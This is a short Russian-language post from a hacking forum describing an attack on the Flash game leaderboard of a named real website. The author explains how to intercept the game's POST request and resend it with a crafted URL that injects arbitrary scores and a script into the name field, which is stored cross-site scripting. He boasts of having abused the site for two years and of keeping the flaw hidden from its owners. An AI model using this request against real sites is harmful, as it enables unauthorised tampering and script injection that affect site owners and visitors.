ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Атака через флэш-игру

Сразу кидаю линк на багу: http://borneo.ru/game/

Там внизу таблица с результатами игры, я сначала скрипты понавешал, а потом решил всё убрать, а то мало ли... обидятся ))
Ну вообщем там не должно по идее быть такого...

Карочи, фсё просто, когда заканчивается флэsh-игра, то сценарий отправляет POST на CGI,
перехватываем его чемниТь типа Naviscope
и отправляем другие данные на скрипт (в урл формате):

borneo.ru/cgi-bin/game/game.cgi?loadedBytes=283400&totalBytes=283400&go=% 5Btype+
Function%5D&a=224%2C254%2C320%2C380%2C420&b=390%2C 363%2C340%2C360%2C405&puli=
2&patron=0&i=6&tur=0&points=ЗДЕСЬ_МОИ_ОЧКИ&g=5&labla=lev52&name=ЗДЕСЬ_МОЙ_СКРИПТ

мм...да... я их мучаю уже второй год, там уж в чате более половины функций удалили...
Но мы им не скажем... пусть думают, что эти глюки от перебоев в электросети